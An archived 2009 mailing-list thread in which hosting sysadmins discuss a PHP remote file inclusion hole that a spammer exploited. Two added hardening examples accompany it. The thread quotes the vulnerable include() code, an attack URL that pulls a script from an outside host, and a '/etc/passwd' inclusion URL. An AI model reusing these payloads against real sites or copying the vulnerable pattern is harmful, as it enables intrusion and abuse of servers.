Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Discussion threads Romain Bourdy
And disable curl module BTW ;)


On Thu, Feb 19, 2009 at 4:41 PM, Radek Mrskos mrs...@volume.ch wrote:
 I think this is what you should have anyway in your php.ini:


 allow_url_fopen = Off

 /Radek
___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog


Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Discussion threads Philip Iezzi
luckily in this very single case! :)


On 19.02.2009, at 17:05, Mike Kellenberger wrote:

 luckily in this case: it's a windows server...

 regards,

 mike

 --  
 Mike Kellenberger  mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235 0700
 http://www.escapenet.ch   Skype mikek70atwork


 -Original Message-
 From: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] On behalf of Gianni Carafa
 Sent: Thursday, 19 February 2009 17:04
 To: swi...@swinog.ch
 Subject: Re: [swinog] F*ing Spammers and stupid customer code...

 That's bad coding anyway:

 http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd



 Regards Gianni





 Radek Mrskos wrote:
 I think this is what you should have anyway in your php.ini:


 allow_url_fopen = Off

 /Radek
 On 19.02.2009 at 16:31, Mike Kellenberger wrote:


 Hi all

 Just stopped our mail server from spitting out thousands of spam
 messages.

 We have a customer who has a site with the following (stupid) code in
 his index.php:

 // $called_page_link comes straight from the query string (register_globals)
 if($called_page_link!="")
 {
     $requested_file=$called_page_link;
 }

 include($requested_file);


 The f*ing spammer found out about this and called the page with:

 http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocities.com/nimiuu/fuck.txt?


 Boom.

 Have I already told you that I hate spammers? :-)

 Oh well, one down - a few million to go...


 Regards,

 Mike

 -- 
 Mike Kellenberger  mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235 0700
 http://www.escapenet.ch   Skype mikek70atwork




 Kind regards

 Radek Mrskos   Email: mrs...@volume.ch
 Baechlerstr. 12Tel:  +41 43 534 40 24
 CH-8802 Kilchberg  Mob: +41 79 219 68 66
 PGP:0x8CB69F6D  Fax: +41 86079 2196 866




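The index.php quoted in this message includes whatever string the request names, so any readable local file (Gianni's /etc/passwd) or, with URL includes enabled, any remote script gets executed. The following is an added example, not code from the thread or from the customer's site: a replacement for that index.php that maps a request key to a fixed allowlist of files under a hypothetical ./pages/ directory, so no request-controlled string ever reaches include(). The directory name, the page keys and the file names are assumptions.

```php
<?php
// Added example, not code from the thread: a hardened replacement for the quoted index.php.
// Assumption: sub-pages live in the hypothetical directory ./pages/ and are selected by a short key.
declare(strict_types=1);

// Only these keys are accepted; the request never supplies a file name or a path.
const PAGE_MAP = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'news'    => 'news.php',
];

/**
 * Map an untrusted page key to an absolute path inside $pagesDir, or return null
 * when the key is unknown or the resolved file lies outside that directory.
 */
function resolve_page(string $key, string $pagesDir): ?string
{
    if (!array_key_exists($key, PAGE_MAP)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . PAGE_MAP[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    // Even an allowlisted name must still resolve under the pages directory
    // (guards against the file having been swapped for a symlink pointing elsewhere).
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly (no register_globals) and reject non-string values
// such as ?called_page_link[]=x, which would otherwise reach string functions as an array.
$raw = $_GET['called_page_link'] ?? 'home';
$key = is_string($raw) ? $raw : '';

$file = resolve_page($key, __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    header('Content-Type: text/plain');
    echo "Unknown page\n";
    exit;
}
include $file;
```

With this shape the php.ini settings discussed in the thread become defence in depth rather than the only barrier: a request such as ?called_page_link=http://example.invalid/x.txt or ?called_page_link=/etc/passwd is simply an unknown key and answers 404.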


Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Discussion threads Mike Kellenberger
luckily in this case: it's a windows server...

regards,

mike

-- 
Mike Kellenberger  mike.kellenber...@escapenet.ch
Escapenet - the Web Company   Tel +41 52 235 0700
http://www.escapenet.ch   Skype mikek70atwork


-Original Message-
From: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] On behalf of Gianni Carafa
Sent: Thursday, 19 February 2009 17:04
To: swi...@swinog.ch
Subject: Re: [swinog] F*ing Spammers and stupid customer code...

That's bad coding anyway:

http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd 



Regards Gianni





Radek Mrskos wrote:
 I think this is what you should have anyway in your php.ini:


 allow_url_fopen = Off

 /Radek


Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Discussion threads Philip Iezzi
Hey Mike

First thing to remember: never get nervous about a spammer! There are too many out there. It's just not worth your time to get angry about such things...
It was our choice to become sysadmins - spamfighting is one of our big daily tasks. We might as well work for McDonalds - there's spam too.

Turning off allow_url_fopen and CURL might give you some headaches with customers that definitely need the option to fetch remote data. So here's my recommended setup (allow_url_include was introduced in PHP 5.2.0):

allow_url_fopen = On
allow_url_include = Off

This will protect you from the most stupid spammers, at least.
Next, work on some secure PHP setup, say: running PHP as CGI with Apache's SuExec.
You should also throttle emails sent by PHP, e.g. with a simple sendmail wrapper:
http://www.iezzi.ch/archives/258
http://www.iezzi.ch/archives/217

Regards,
Philip

-- 
Onlime Webhosting
Wachterweg 21
CH-8057 Zürich

phone  +41 44 508 0702
skype  ondalime
i...@onlime.ch - http://www.onlime.ch



On 19.02.2009, at 16:46, Mike Kellenberger wrote:

 totally correct, thanks! Looks like I'm the stupid SysAdmin as  
 well... :-)

 Regards,

 Mike

 -- 
 Mike Kellenberger  mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235 0700
 http://www.escapenet.ch   Skype mikek70atwork


 -Original Message-
 From: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] On behalf of Radek Mrskos
 Sent: Thursday, 19 February 2009 16:41
 To: Mike Kellenberger
 Cc: swi...@swinog.ch
 Subject: Re: [swinog] F*ing Spammers and stupid customer code...

 I think this is what you should have anyway in your php.ini:


 allow_url_fopen = Off

 /Radek
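Philip's last recommendation, throttling mail sent through PHP with a sendmail wrapper, as an added example that is not the wrapper from the linked articles: a PHP CLI script installed as PHP's sendmail_path. It counts messages per originating script and hour, refuses delivery above a limit (so a hijacked index.php like the one in this thread can send at most that many mails per hour before mail() starts returning false), and otherwise hands the message to the real sendmail. The paths, the limit, the state directory and the use of mail.add_x_header (PHP 5.3 and later) for attribution are assumptions.

```php
#!/usr/bin/env php
<?php
// Added example, not the wrapper from the linked articles. Install via php.ini:
//   sendmail_path = "/usr/local/bin/sendmail-throttle -t -i"
//   mail.add_x_header = On     (PHP >= 5.3: adds X-PHP-Originating-Script: <uid>:<script>)
// All paths and the limit below are assumptions for this example.
declare(strict_types=1);

const REAL_SENDMAIL = '/usr/sbin/sendmail';          // assumed path of the real sendmail binary
const STATE_DIR     = '/var/tmp/php-mail-throttle';  // assumed: writable by the PHP/web user
const LOG_FILE      = '/var/log/php-mail-throttle.log';
const MAX_PER_HOUR  = 100;                           // assumed limit per originating script

/** Derive the counter key from the X-PHP-Originating-Script header, else from the process uid. */
function sender_key(string $message): string
{
    if (preg_match('/^X-PHP-Originating-Script:\s*(\S+)/mi', $message, $m) === 1) {
        return preg_replace('/[^A-Za-z0-9_.:-]/', '_', $m[1]);
    }
    return 'uid' . getmyuid();
}

/** Increment the per-key counter for this hour and report whether it is still within $limit. */
function under_limit(string $key, int $hourBucket, int $limit): bool
{
    if (!is_dir(STATE_DIR) && !@mkdir(STATE_DIR, 0700, true)) {
        return false;                                // fail closed: no state, no mail
    }
    $fh = fopen(STATE_DIR . "/$key.$hourBucket", 'c+');
    if ($fh === false || !flock($fh, LOCK_EX)) {
        return false;
    }
    $count = (int) stream_get_contents($fh) + 1;     // file is empty on first use -> 1
    rewind($fh);
    ftruncate($fh, 0);
    fwrite($fh, (string) $count);
    flock($fh, LOCK_UN);
    fclose($fh);
    return $count <= $limit;
}

$message = stream_get_contents(STDIN);
$key     = sender_key($message);
$bucket  = intdiv(time(), 3600);

if (!under_limit($key, $bucket, MAX_PER_HOUR)) {
    // Log and refuse. A non-zero exit makes PHP's mail() return false; nothing is queued.
    error_log(date('c') . " throttled key=$key limit=" . MAX_PER_HOUR . "/h\n", 3, LOG_FILE);
    exit(75);                                        // EX_TEMPFAIL
}

// Under the limit: pass the message and the original sendmail arguments (-t -i) through.
$cmd  = escapeshellarg(REAL_SENDMAIL) . ' '
      . implode(' ', array_map('escapeshellarg', array_slice($argv, 1)));
$proc = proc_open($cmd, [0 => ['pipe', 'r']], $pipes);
if (!is_resource($proc)) {
    exit(75);
}
fwrite($pipes[0], $message);
fclose($pipes[0]);
exit(proc_close($proc));
```

The log line is the useful part for the sysadmin: it names the script (uid and file) that hit the limit, which is exactly the information Mike needed to find the customer's index.php. Old counter files under STATE_DIR can be removed by a cron job; the hour bucket in the file name keeps them from being reused.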


Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Discussion threads Daniel Kamm
Mike Kellenberger wrote:
 totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)

Actually, this problem has been known for ages. I wonder why you fell into 
that only now.

But what I really realise is that this list is populated by Swiss 
hosting sysadmins from all the important hosters, but they don't really 
share their experience and their actual problems. I mean, in my old 
hosting days I was glad to have some direct connections (for example 
via IRC) where I could just point out some troubles and solve them quickly.

So hosting sysadmins, please get together and share your minds! This list 
is very network related, and that is fine. Probably another list 
would suit all hosters better.

Cheerz,
  - Dan

PS: If I still was with a hoster, I would now take care of that. So 
maybe someone else can take the initiative.